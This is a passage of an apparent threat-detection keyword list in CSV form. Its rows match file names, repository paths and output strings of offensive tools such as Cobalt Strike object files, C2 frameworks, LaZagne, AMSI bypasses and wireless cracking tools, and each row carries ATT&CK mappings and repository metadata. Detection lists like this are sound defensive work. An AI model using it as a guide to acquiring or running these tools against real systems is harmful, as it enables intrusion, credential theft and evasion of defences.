T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*ahmedkhlief/Ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*ahmedkhlief/Ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*AhMyth-Android-RAT*,offensive_tool_keyword,AhMyth-Android-RAT,AhMyth Android Rat,T1020 - T1071 - T1071.001,TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/AhMyth/AhMyth-Android-RAT,1,0,N/A,N/A,10,3977,1663,2021-08-12T21:23:08Z,2017-07-07T03:03:37Z -*ahsten.run \*powershell.exe*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*aigmfoeogfnljhnofglledbhhfegannp*,greyware_tool_keyword,Lethean Proxy VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Airbash*,offensive_tool_keyword,Airbash,A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.,T1565 - T1593 - T1594 - T1567,TA0002 - TA0007 - TA0009 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/tehw0lf/airbash,1,0,N/A,N/A,4,340,64,2021-10-26T09:47:34Z,2018-04-18T23:50:15Z -*Aircrack-ng*,offensive_tool_keyword,aircrack-ng,WiFi security auditing tools suite.,T1110 - T1170 - T1180 - T1201 - T1213,TA0001 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/aircrack-ng/aircrack-ng,1,0,N/A,N/A,10,4234,838,2023-09-30T22:40:36Z,2018-03-10T17:11:11Z -*aircrack-ng*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*aireplay-ng *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*aireplay-ng *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Airgeddon*,offensive_tool_keyword,Airgeddon,This is a multi-use bash script for Linux systems to audit wireless networks.,T1590 - T1533 - T1170 - T1583.001,TA0002 - TA0003 - ,N/A,N/A,Network Exploitation tools,https://github.com/v1s1t0r1sh3r3/airgeddon,1,0,N/A,N/A,10,5428,1104,2023-10-02T21:32:56Z,2016-03-18T10:34:56Z -*airman604/splunk_whisperer*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*airmon-ng*,offensive_tool_keyword,airmon-ng,This script can be used to enable monitor mode on wireless interfaces. It may also be used to kill network managers or go back from monitor mode to managed mode,T1018 - T1040,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://www.aircrack-ng.org/doku.php?id=airmon-ng,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*airodump-ng *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*airpwn-ng*,offensive_tool_keyword,airpwn-ng,We force the targets browser to do what we want,T1562 - T1564 - T1565 - T1566 - T1567 - T1573,TA0005 - TA0007 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/ICSec/airpwn-ng,1,1,N/A,N/A,1,23,11,2022-11-07T02:22:34Z,2021-07-20T03:43:13Z -*aix2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*aix2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ajpc500/BOFs*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*akeehkgglkmpapdnanoochpfmeghfdln*,greyware_tool_keyword,VPN Master,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*akkbkhnikoeojlhiiomohpdnkhbkhieh*,greyware_tool_keyword,Prime VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*AlanFramework.git*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*Alcatraz.sln*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*Alcatraz.vcxproj*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*Alcatraz/obfuscator*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*Alcatraz-master.zip*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*AlessandroZ/BeRoot*,offensive_tool_keyword,BeRoot,BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.,T1068 - T1548 - T1574,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*AlessandroZ/BeRoot*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*AlessandroZ/LaZagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*alexa-top-20000-sites.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*al-khaser*,offensive_tool_keyword,al-khaser,al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar,T1055 - T1117 - T1218 - T1003 - T1552,TA0002 - TA0008 - TA0006,N/A,N/A,Exploitation tools,https://github.com/LordNoteworthy/al-khaser,1,0,N/A,N/A,10,5073,1120,2023-09-29T17:54:38Z,2015-11-12T18:35:16Z -*All EDR drivers were successfully removed from Kernel callbacks!*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*All_SubdomainTOP_Seclist.txt*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*AllowDelegationUsers.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*AllowDelegationUsers_samaccountnames_only.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*almalgbpmcfpdaopimbdchdliminoign*,greyware_tool_keyword,Urban Shield,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*almandin/krbjack*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,1,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*ALPC-TaskSched-LPE*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ALPC-TaskSched-LPE.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Alphabug_CS*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*Alphabug_CS*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*AlphabugX/csOnvps*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*AlphabugX/csOnvps*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*Already SYSTEM*not elevating*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*AlteredSecurity/365-Stealer*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,1,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*alwaysinstallelevated.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*alwaysinstallelevated.c*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*alwaysinstallelevated.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*am0nsec/HellsGate*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*amass enum -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*amass-get-rootdomains*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*amass-get-subdomains*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*amnoibeflfphhplmckdbiajkjaoomgnj*,greyware_tool_keyword,HideAll VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*AMS1-Patch.exe*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*AMSI patched in all powershells*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,0,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*AMSI_Bypass.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*AMSI_bypass_20*.ps1,offensive_tool_keyword,PSSW100AVB,This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/tihanyin/PSSW100AVB,1,1,N/A,N/A,10,983,166,2022-06-18T16:52:38Z,2021-10-08T17:36:24Z -*AMSI_patch-main*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense 